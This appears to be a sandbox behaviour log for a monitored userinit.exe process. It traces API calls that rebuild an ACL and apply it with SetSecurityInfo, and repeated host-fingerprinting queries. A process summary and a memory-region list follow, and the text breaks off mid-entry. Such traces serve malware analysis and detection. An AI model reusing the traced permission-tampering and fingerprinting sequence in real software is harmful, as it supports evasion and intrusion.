[0202.133] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fe74, pSourceSid=0x150f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.133] IsValidSid (pSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0202.133] ConvertSidToStringSidA () returned 0x1
[0202.133] LocalFree (hMem=0x157018) returned 0x0
[0202.133] GetAce (in: pAcl=0x150f3c, dwAceIndex=0x1, pAce=0x10e69c | out: pAce=0x10e69c*=0x150f5c) returned 1
[0202.133] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6ff60, pSourceSid=0x150f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.133] IsValidSid (pSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.133] ConvertSidToStringSidA () returned 0x1
[0202.133] LocalFree (hMem=0x157018) returned 0x0
[0202.133] GetAce (in: pAcl=0x150f3c, dwAceIndex=0x2, pAce=0x10e69c | out: pAce=0x10e69c*=0x150f70) returned 1
[0202.133] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a629c0, pSourceSid=0x150f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0202.133] IsValidSid (pSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0202.133] ConvertSidToStringSidA () returned 0x1
[0202.133] LocalFree (hMem=0x157018) returned 0x0
[0202.134] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.134] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0202.134] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x150f28, lpbSaclPresent=0x10e80c, pSacl=0x10e800, lpbSaclDefaulted=0x10e804 | out: lpbSaclPresent=0x10e80c, pSacl=0x10e800, lpbSaclDefaulted=0x10e804) returned 1
[0202.134] LocalFree (hMem=0x150f28) returned 0x0
[0202.134] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.134] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.134] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0202.134] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0202.134] GetLastError () returned 0x0
[0202.134] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.134] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0202.134] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.134] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0202.134] InitializeAcl (in: pAcl=0x157fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x157fa8) returned 1
[0202.134] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.134] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0202.134] GetLastError () returned 0x0
[0202.135] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.135] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0202.135] SetLastError (dwErrCode=0x0)
[0202.135] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.135] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0202.135] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0202.135] GetLastError () returned 0x0
[0202.135] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.135] SetLastError (dwErrCode=0x0)
[0202.135] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.135] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0202.135] GetSidIdentifierAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f616
[0202.135] GetLastError () returned 0x0
[0202.135] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.135] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.135] SetLastError (dwErrCode=0x0)
[0202.135] GetSidSubAuthorityCount (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a6f615
[0202.135] GetLastError () returned 0x0
[0202.135] SetLastError (dwErrCode=0x0)
[0202.136] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.136] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0202.136] GetSidSubAuthority (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a6f61c
[0202.136] GetLastError () returned 0x0
[0202.136] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0202.136] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0202.136] GetLastError () returned 0x0
[0202.136] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.136] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0202.136] AddAce (in: pAcl=0x157fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x142f90, nAceListLength=0x14 | out: pAcl=0x157fa8) returned 1
[0202.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.136] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0202.136] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0202.136] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0202.136] SetSecurityInfo () returned 0x0
[0202.137] CloseHandle (hObject=0x1d0) returned 1
[0202.137] GetComputerNameA (in: lpBuffer=0x2a6fd84, nSize=0x10ead4 | out: lpBuffer="CRH2YWU7", nSize=0x10ead4) returned 1
[0202.137] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.137] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.137] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.137] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.138] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.138] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0202.138] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.138] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.138] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.139] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.140] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.140] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.140] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.140] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x10eabc, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x10ead0, lpMaximumComponentLength=0x10eacc, lpFileSystemFlags=0x10eac8, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10ead0*=0x90c08a66, lpMaximumComponentLength=0x10eacc*=0xff, lpFileSystemFlags=0x10eac8*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0202.140] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10e9c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.140] GetSystemDefaultLangID () returned 0x130409
[0202.140] VerLanguageNameA (in: wLang=0x409, szLang=0x10ea74, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0202.141] ExitProcess (uExitCode=0x0)
Thread:
id = 344
os_tid = 0x8e0
Thread:
id = 345
os_tid = 0x99c
Process:
id = "55"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be920"
os_pid = "0x998"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 6746
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 6747
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6748
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6749
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 6750
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 6751
start_va = 0xec0000
end_va = 0xec8fff
entry_point = 0xec0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 6752
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6753
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6754
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6755
start_va = 0x7ffd3000
end_va = 0x7ffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd3000"
filename = ""
Region:
id = 6756
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 6758
start_va = 0x260000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 6759
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6760
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6761
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6762
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6763
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 6764
start_va = 0x6d6b0000
end_va = 0x6d733fff
entry_point = 0x6d6b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 6765
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 6766
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6767
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6768
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6769
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6770
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6771
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6772
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6773
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6774
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6775
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6776
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6777
start_va = 0x470000
end_va = 0x537fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 6778
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6779
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6780
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 6781
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 6782
start_va = 0x540000
end_va = 0x640fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 6783
start_va = 0x7a0000
end_va = 0x7affff
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 6784
start_va = 0xed0000
end_va = 0x1acffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ed0000"
filename = ""
Region:
id = 6785
start_va = 0x650000
end_va = 0x74ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 6786
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 6787
start_va = 0x1b0000
end_va = 0x25ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 6788
start_va = 0x7b0000
end_va = 0x88efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 6789
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 6790
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 6791
start_va = 0x890000
end_va = 0x9dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000890000"
filename = ""
Region:
id = 6792
start_va = 0x1ad0000
end_va = 0x23fffff
entry_point = 0x1ad0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 6793
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 6794
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 6795
start_va = 0x9e0000
